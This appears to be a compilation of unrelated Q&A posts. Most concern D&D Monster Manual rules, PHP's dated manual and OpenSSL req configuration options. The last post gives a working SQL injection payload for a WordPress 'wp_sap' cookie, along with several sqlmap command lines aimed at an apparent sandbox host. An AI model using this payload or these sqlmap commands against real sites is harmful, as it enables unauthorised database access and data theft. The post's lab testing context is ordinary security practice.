Are the giant strength scores in the Monster Manual wrong?

The Storm Giant has a STR score of 29. According to the encumbrance rules that means the maximum weight a giant could lift is 435 lb. which really isn’t that much.

To put it in perspective. The Storm giant is 5x taller than a human, at the same proportion and thus has about 25x more mass. An average human male weighs around 180lb. A Storm Giant thus weighs around 4500 lb. So it’s impossible for one Storm Giant to carry another.

Another way of looking at it. A human-scale sword might be around 4ft. long and weigh 3 pounds. However, a sword that’s long enough for a Storm Giant would need to be around 20 ft. long and to maintain its own integrity would need to be about 2 inches thick at its centre and might be a foot wide. A sword like that would weight about 800 lb.

To even be able to wield a sword like that without being encumbered, the Storm Giant would need a minimum STR score of 160.

So in conclusion, Storm Giants must be about the weakest creatures in the Multi-verse on a pound for pound basis 😛

Am I missing some encumbrance rule somewhere that adjusts this based on creature size category?

Is the telepathy rule in the Monster Manual only applicable to monster telepathy abilities?

In the Monster Manual, in the chapter “Monster Statistics” it says:

Telepathy Telepathy is a magical ability that allows a monster to communicate mentally with another creature within a specified range. The contacted creature doesn’t need to share a language with the monster to communicate in this way with it, but it must be able to understand at least one language. A creature without telepathy can receive and respond to telepathic messages but can’t initiate or terminate a telepathic conversation.

A telepathic monster doesn’t need to see a contacted creature and can end the telepathic contact at any time. The contact is broken as soon as the two creatures are no longer within range of each other or if the telepathic monster contacts a different creature within range. A telepathic monster can initiate or terminate a telepathic conversation without using an action, but while the monster is incapacitated, it can’t initiate telepathic contact, and any current contact is terminated. (MM p.9)

Are these rules intended only to apply to monster telepathic abilities?

Specifically, when it says

A creature without telepathy can receive and respond to telepathic messages but can’t initiate or terminate a telepathic conversation.

Does it mean that characters can respond to “a monster’s telepathic messages” or “telepathic messages from any source”?

Several Jeremy Crawford rulings seem to imply that the intent is for this to apply only to monster telepathy (see here and here for example). However, I’ve seen this cited in arguments that have nothing to do with monster telepathy as well (see this answer). So I just want a clear answer as to what case this section of the rules applies to.

Should I get the Dungeon Master’s Guide, the Player’s Handbook, or the Monster Manual? [duplicate]

So I’m a fairly new player in the game Dungeons & Dragons (D&D). I’m known about the game/played a very loose version of the game a little over a year ago and I started getting serious about ten-eleven months ago. Currently, I am still learning about the game, its concepts, and how to play. Something I would love to try is DMing. But there are a few problems with that:

  1. I’m still not a master at the game and I’m still learning
  2. I’m not sure if I have all the resources.

So I’m asking you guys! What would be the most important to get for an inspiring world builder and D&D player? The Dungeon Master’s Guide, the Player Handbook, or the Monster Manual? I currently have some beginner level stuff that just teaches you the basics, but what if I want to go deeper?

What do official sources say about player access to the Monster Manual?

The Introduction of the Monster Manual makes it clear several times that it is a book for DMs (MM, p. 4; emphasis mine):

This bestiary is for storytellers and world-builders. If you have ever thought about running a DUNGEONS & DRAGONS game for your friends, either a single night’s adventure or a long-running campaign, this tome contains page after page of inspiration.** […]

If you’re an experienced Dungeon Master (DM)**, a few of the monster write-ups might surprise you, for we’ve gone into the Monster Manuals of yore and discovered some long-lost factoids. […]

The best thing about being a DM is that you get to invent your own fantasy world and bring it to life, and nothing brings a D&D world to life more than the creatures that inhabit it. […]

The Monster Manual is one of three books that form the foundation of the DUNGEONS & DRAGONS game, the other two being the Player’s Handbook and the Dungeon Master’s Guide. The Monster Manual, like the Dungeon Master’s Guide, is a book for DMs.

However, it stops short of saying the Monster Manual is only for DMs, and does not specifically say that it should not be used by players.


Roll20, on the other hand, clearly made a decision to give players extensive access to information from the Monster Manual. Per the Roll20 wiki page for the Monster Manual:

Players can have direct access to the Monster Manual within the In-App Roll20 Compendium. You can share the Monster Manual with Compendium Sharing.


This is not a question about whether such information should be available to players – that is opinion-based and off-topic.

Rather, I am trying to understand:

  1. Besides the statements in the MM itself, what do other official sources say about to what extent the information players have access to the information in the MM?

  2. Did Roll20 ever explain their decision to provide players with full access to MM information?

While this is a list question, it is a bounded list – I am interested in official sources, and officially licensed sources.

It is not a ‘designer’s intent’ question in that I am not interested in opinion, interpretation, or speculation; I am just trying to track down relevant textual quotes about who has legitimate access to the MM information, and under what circumstances.

How is it possible that such a massively used programming language as PHP has such an eerily “abandoned” manual? [closed]

Like every other god damn question I ever ask on this site, this was apparently "off-topic" even on Stack Overflow. That’s why I ask it here, the only other fitting category I could find.

Every day, I make numerous page loads on PHP.net’s manual to remind myself about details or try to understand what various PHP functions do and how they work. I now use PHP almost exclusively (besides HTML, CSS and SQL), with very little JavaScript for things that need to be client-side and thus must be in JS.

What strikes me is how ancient typos are still there, ones I remember from the early 2000s. The user-submitted comments can say "17 years ago" and things like that, which makes me feel as if I’ve discovered some ancient dwarf book in Moria or something, almost falling apart from age. But it’s the live, current manual for PHP.

This makes me feel uneasy to say the least. I’m not going to pretend as if the manuals for other free software is better. In fact, they are usually much worse, but the fact remains that I use PHP so heavily and have so much of my life invested in it (I’ve now used PHP far longer than I had existed at the time when I first started using it), and so frequently look in its manual, that it means a lot to me.

And it should mean a lot to others as well, considering that it’s one of the most used programming languages in the world.

The code examples are frequently ancient, irrelevant and unclear. I’ve rarely had any use of those, instead being forced to guess my way to how you’re supposed to use the functions, or had to ask on Stack Exchange or read its old questions. Those user-submitted comments are also rarely of any value, frequently dangerously misleading and horribly insecure.

It seems as if somebody should have long ago been paid a full-time salary to painstakingly go through the entire PHP manual and fix all typos, bad descriptions, poor examples, and clean up the mess of user-submitted comments. I also wonder if they have turned off new comments from users or something, because so few of them seem to be made in the last few years. I assume that they have a manual review system in place, and maybe a huge backlog with nobody looking at it?

Why, for such a massively popular language/project, has not one company stepped up to pay for such a single person to do this work? It’s downright embarrassing when the manual is this state.

I can predict the answer:

Why don’t you do it? Patches/donations welcome.

I don’t do it because I’m overwhelmed by just trying to use PHP. I have no peace of mind, a stable life situation, nor even the skills, to fix the PHP manual. But I know that there are many individuals out there who do have peace of mind, a stable life situation (an income), and far better skills than I and who could in theory do it. But they don’t. For some reason.

I’m not calling them evil/lazy. I’m just wondering how this situation can be. It’s depressing. Baffling. Makes me feel as if I’m using some sort of legacy application.

I’ve countless times gone hunting for "PHP alternatives", many times asking people about it, etc., but not once have they been able to present me with a valid alternative, so I’ve stuck to PHP. Also, it would have to be pretty darn fantastic for me to just abandon my entire system and start trying to remake it in some other language which doesn’t even seem to exist. The alternatives mentioned always have some major problem which is far worse than PHP’s issues, such as Python with its major incompatibilities between versions which makes PHP appear stable as a rock.

But this question isn’t about possible PHP alternatives. It’s about why the PHP manual is in such a perpetually miserable and "rotting" state.

I’ve also discovered parts of the manual, probably for classes/functions added in recent years, which aren’t "commented" at all, but seemingly simply generated from source code. Yet they still develop the language itself, and it’s improved all the time. But the manual doesn’t really reflect any of this; it makes the PHP project seem almost abandoned.

I don’t understand it. If I ever make it and start actually making money, I’m going to seriously consider hiring somebody to brush up the PHP manual. It’s the least I could do to give back, and it frankly makes me angry that nobody else has ever thought like this. Or maybe there are no previously-poor people out there who "made it" rich by using PHP? (Seems unlikely.)

Optional/Mandatory Requirement For ‘req’ Command Configuration File Options Missing In OpenSSL v1.1.1g Manual Pages?

The OpenSSL v1.1.1 manual page for the req command’s Configuration File Format options seems to be missing any mention about whether each option is mandatory or optional. The other OpenSSL command manual pages (ca and ts) that support configuration file usage do stipulate whether each configuration file option is mandatory or optional.

Does anyone know which req configuration file options are mandatory and which are optional?

SQLMap Cookie Injectioin with Working Manual SQLi

I’m using an existing exploit which calls for a cookie called wp_sap to be set with the following value:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] 

This works great manually. Now, I’d like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I’ve tried the following variations to no avail.

sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy http://127.0.0.1:8080  sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy http://127.0.0.1:8080  sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy http://127.0.0.1:8080 

I’d really appreciate some help to get this working.